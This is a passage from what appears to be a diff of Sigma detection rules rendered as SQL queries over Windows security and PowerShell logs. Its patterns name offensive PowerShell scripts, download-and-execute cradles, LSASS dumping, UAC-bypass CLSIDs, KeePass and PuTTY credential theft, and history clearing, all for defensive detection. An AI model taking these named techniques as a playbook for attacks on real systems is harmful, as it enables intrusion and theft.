ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-encode%' ESCAPE '\\' OR CommandLine LIKE '%/encode%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_certutil_encode.yml" }, { - "title": "Potential Active Directory Enumeration Using AD Module - PsModule", - "id": "74176142-4684-4d8a-8b0a-713257e7df8e", - "status": "experimental", - "description": "Detects usage of the \"Import-Module\" 
cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", - "author": "Nasreddine Bencherchali (Nextron Systems), frack113", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ - "attack.reconnaissance", - "attack.discovery", - "attack.impact" + "attack.defense_evasion", + "attack.persistence", + "attack.execution", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_active_directory_module_dll_import.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation 
command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo 
LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_specific.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "PowerShell Get Clipboard", - "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", - "status": "experimental", - "description": "A General detection for the Get-Clipboard commands in PowerShell logs. 
This could be an adversary capturing clipboard contents.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", + "status": "test", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1115" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_get_clipboard.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell Module", - "id": "6bfb8fa7-b2e7-4f6c-8d9d-824e5d06ea9e", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - 
"author": "Jonathan Cheong, oscd.community", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", + "status": "test", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", + "attack.t1036.004", "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Clear PowerShell History - PowerShell Module", - "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", - "status": "experimental", - "description": "Detects keywords that could indicate clearing PowerShell 
history", - "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1070.003" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% 
/Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_clear_powershell_history.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Module", - "id": "daf7eb81-35fd-410d-9d7a-657837e602bb", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", - "author": "frack113", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Compress-Archive %' ESCAPE '\\' AND ContextInfo LIKE '% -Path %' ESCAPE '\\' AND ContextInfo LIKE '% -DestinationPath %' ESCAPE '\\' AND ContextInfo LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_zip_compress.yml" + "filename": "proc_creation_win_schtasks_env_folder.yml" }, { - "title": "Suspicious Get Local Groups Information", - "id": "cef24b90-dddc-4ae1-a09a-8764872f69fc", - "status": "test", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and 
which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", - "author": "frack113", + "title": "Finger.exe Suspicious Invocation", + "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "status": "experimental", + "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Administrator script" + "Admin activity (unclear what they do nowadays with finger.exe)" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((Payload LIKE '%get-localgroup%' ESCAPE '\\' OR Payload LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ContextInfo LIKE '%get-localgroup%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (Payload LIKE '%Get-WMIObject%' ESCAPE '\\' AND Payload LIKE '%Win32\\_Group%' ESCAPE '\\') OR (ContextInfo LIKE '%Get-WMIObject%' ESCAPE '\\' AND ContextInfo LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'finger.exe' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_local_group_reco.yml" + "filename": "proc_creation_win_finger_usage.yml" }, { - "title": "Suspicious Get-ADDBAccount Usage", - "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "title": "HackTool - Dumpert Process Dumper Execution", + "id": "2704ab9e-afe2-4854-a3b1-0c0706d03578", "status": "test", - "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials 
without using any credential dumpers", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.003" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Hashes LIKE '%09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR CommandLine LIKE '%Dumpert.dll%' ESCAPE '\\'))" ], - "filename": "posh_pm_get_addbaccount.yml" + "filename": "proc_creation_win_hktl_dumpert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - PowerShell Module", - "id": "ebdf49d8-b89c-46c9-8fdf-2c308406f6bd", + "title": "Dism Remove Online Package", + "id": "43e32da2-fdd0-4156-90de-50dfd62636f9", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Deployment Image Servicing and Management tool. 
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%/Online%' ESCAPE '\\' AND ParentCommandLine LIKE '%/Disable-Feature%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Dism.exe' ESCAPE '\\' AND CommandLine LIKE '%/Online%' ESCAPE '\\' AND CommandLine LIKE '%/Disable-Feature%' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_dsim_remove.yml" }, { - "title": "Process Hacker and System Informer Driver Load", - "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", + "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", + "id": "435e10e4-992a-4281-96f3-38b11106adde", "status": "experimental", - "description": "Detects the load of drivers used by Process Hacker and System Informer", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "cve.2021.21551", - "attack.t1543" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ - "Legitimate user of process hacker or system informer by low level developers or system administrators" + "Legitimate admin scripts may use the same technique, it's better to exclude specific 
computers or users who execute these commands or scripts often" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE '%SHA256=8B9AD98944AC9886EA4CB07700E71B78BE4A2740934BB7E46CA3B56A7C59AD24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A41348BEC147CA4D9EA2869817527EB5CEA2E20202AF599D2B30625433BCF454%' ESCAPE '\\' OR Hashes LIKE '%SHA256=38EE0A88AF8535A11EFE8D8DA9C6812AA07067B75A64D99705A742589BDD846D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=A773891ACF203A7EB0C0D30942FB1347648F1CD918AE2BFD9A4857B4DCF5081B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4C3B81AC88A987BBDF7D41FA0AECC2CEDF5B9BD2F45E7A21F376D05345FC211D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3241BC14BEC51CE6A691B9A3562E5C1D52E9D057D27A3D67FD0B245C350B6D34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=047C42E9BBA28366868847C7DAFC1E043FB038C796422D37220493517D68EE89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18931DC81E95D0020466FA091E16869DBE824E543A4C2C8FE644FA71A0F44FEB%' ESCAPE '\\' OR Hashes LIKE '%SHA256=B4C2EF76C204273132FDE38F0DED641C2C5EE767652E64E4C4071A4A973B6C1B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=640954AFC268565F7DAA6E6F81A8EE05311E33E34332B501A3C3FE5B22ADEA97%' ESCAPE '\\' OR Hashes LIKE '%SHA256=251BE949F662C838718F8AA0A5F8211FB90346D02BD63FF91E6B224E0E01B656%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E2606F272F7BA054DF16BE464FDA57211EF0D14A0D959F9C8DCB0575DF1186E4%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=3A9E1D17BEEB514F1B9B3BACAEE7420285DE5CBDCE89C5319A992C6CBD1DE138%' ESCAPE '\\') OR sha256 IN ('8b9ad98944ac9886ea4cb07700e71b78be4a2740934bb7e46ca3b56a7c59ad24', 'a41348bec147ca4d9ea2869817527eb5cea2e20202af599d2b30625433bcf454', '38ee0a88af8535a11efe8d8da9c6812aa07067b75a64d99705a742589bdd846d', 'a773891acf203a7eb0c0d30942fb1347648f1cd918ae2bfd9a4857b4dcf5081b', '4c3b81ac88a987bbdf7d41fa0aecc2cedf5b9bd2f45e7a21f376d05345fc211d', '3241bc14bec51ce6a691b9a3562e5c1d52e9d057d27a3d67fd0b245c350b6d34', '047c42e9bba28366868847c7dafc1e043fb038c796422d37220493517d68ee89', '18931dc81e95d0020466fa091e16869dbe824e543a4c2c8fe644fa71a0f44feb', 'b4c2ef76c204273132fde38f0ded641c2c5ee767652e64e4c4071a4a973b6c1b', '640954afc268565f7daa6e6f81a8ee05311e33e34332b501a3c3fe5b22adea97', '251be949f662c838718f8aa0a5f8211fb90346d02bd63ff91e6b224e0e01b656', 'e2606f272f7ba054df16be464fda57211ef0d14a0d959f9c8dcb0575df1186e4', '3a9e1d17beeb514f1b9b3bacaee7420285de5cbdce89c5319a992c6cbd1de138'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" ], - "filename": "driver_load_win_process_hacker.yml" + "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" }, { - "title": "Vulnerable Lenovo Driver Load", - "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", + "title": "Root Certificate Installed From Susp Locations", + "id": "5f6a601c-2ecb-498b-9c33-660362323afa", "status": "experimental", - "description": "Detects the load of the vulnerable Lenovo 
